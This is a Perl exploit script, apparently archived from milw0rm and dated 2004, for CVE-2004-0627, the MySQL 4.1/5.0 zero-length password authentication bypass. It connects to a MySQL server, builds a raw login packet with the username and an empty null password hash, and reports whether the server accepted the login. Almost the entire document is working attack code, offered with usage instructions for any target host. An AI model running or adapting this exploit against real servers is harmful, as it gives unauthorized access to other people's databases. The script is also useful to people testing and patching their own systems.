MySQL 4.1/5.0 - Zero-Length Password Authentication Bypass- CVE-2004-0627

1. #!/usr/bin/perl
2. #
3. # The script connects to MySQL and attempts to log in using a zero-length password
4. # Based on the vuln found by NGSSecurity
5. #
6. # The following Perl script can be used to test your version of MySQL. It will display
7. # the login packet sent to the server and it's reply.
8. #
9. # Exploit copyright (c) 2004 by Eli Kara, Beyond Security
10. # elik beyondsecurity com
11. #
12. use strict;
13. use IO::Socket::INET;
14.  
15. usage() unless ((@ARGV >= 1) || (@ARGV <= 3));
16.  
17. my $username = shift(@ARGV);
18. my $host = shift(@ARGV);
19. if (!$host)
20. {
21.   usage();
22. }
23. my $port = shift(@ARGV);
24. if (!$port)
25. {
26.  $port = 3306; print "Using default MySQL port (3306)\n";
27. }
28.  
29. # create the socket
30. my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
31. $socket or die "Cannot connect to host!\n";
32.  
33. # receive greeting
34. my $reply;
35. recv($socket, $reply, 1024, 0);
36. if (length($reply) < 7)
37. {
38.  print "Not allowed to connect to MySQL!\n";
39.  exit(1);
40. }
41. print "Received greeting:\n";
42. HexDump($reply);
43. print "\n";
44.  
45. # here we define the login OK reply
46. # my $login_ok = "\x01\x00\x00\x02\xFE";
47.  
48. # break the username string into chars and rebuild it
49. my $binuser = pack("C*", unpack("C*", $username));
50.  
51. # send login caps packet with password
52. my $packet = "\x85\xa6".
53.              "\x03\x00\x00".
54.     "\x00".
55.     "\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc..
56.              "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
57.              "\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash
58.              "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash
59.  
60. substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1)
61.  
62. print "Sending caps packet:\n";
63. HexDump($packet);
64. print "\n";
65. send $socket, $packet, 0;
66.  
67. # receive reply
68. recv($socket, $reply, 1024, 0);
69. print "Received reply:\n";
70. HexDump($reply);
71.  
72. my @list_bytes = unpack("C*", $reply);
73.  
74. #print "The fifth byte is: ", $list_bytes[4], "\n";
75. if (length(@list_bytes) >= 4)
76. {
77.  print "Response insufficent\n";
78. }
79.  
80. #if ($reply eq $login_ok)
81. if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
82. {
83.  print "Received OK reply, authentication successful!!\n";
84. }
85. else
86. {
87.  print "Authentication failed!\n";
88. }
89.  
90. # close
91. close($socket);
92.  
93.  
94. sub usage
95. {
96.     # print usage information
97.     print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n
98. <username> - The DB username to authenticate as
99. <host> - The host to connect to
100. [port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n";
101.     exit(1);
102. }
103.  
104.  
105. ###
106. # do a hexdump of a string (assuming it's binary)
107. ###
108. sub HexDump
109. {
110.  my $buffer = $_[0];
111.  
112.  # unpack it into chars
113.  my @up = unpack("C*", $buffer);
114.  my $pos=0;
115.  
116.  # calculate matrix sizes
117.  my $rows = int(@up/16);
118.  my $leftover = int(@up%16);
119.  
120.  for( my $row=0; $row < $rows ; $row++, $pos+=16)
121.  {
122.   printf("%08X\t", $pos);
123.   my @values = @up[$pos .. $pos+15];
124.   my @line;
125.   foreach my $val (@values)
126.   {
127.    push(@line, sprintf("%02X", $val));
128.   }
129.   print join(' ', @line), "\n";
130.  }
131.  # print last line
132.  printf("%08X\t", $pos);
133.  my @values = @up[$pos .. $pos+$leftover-1];
134.  my @line;
135.  foreach my $val (@values)
136.  {
137.   push(@line, sprintf("%02X", $val));
138.  }
139.  print join(' ', @line), "\n";
140. }
141.  
142. # milw0rm.com [2004-07-10]
143.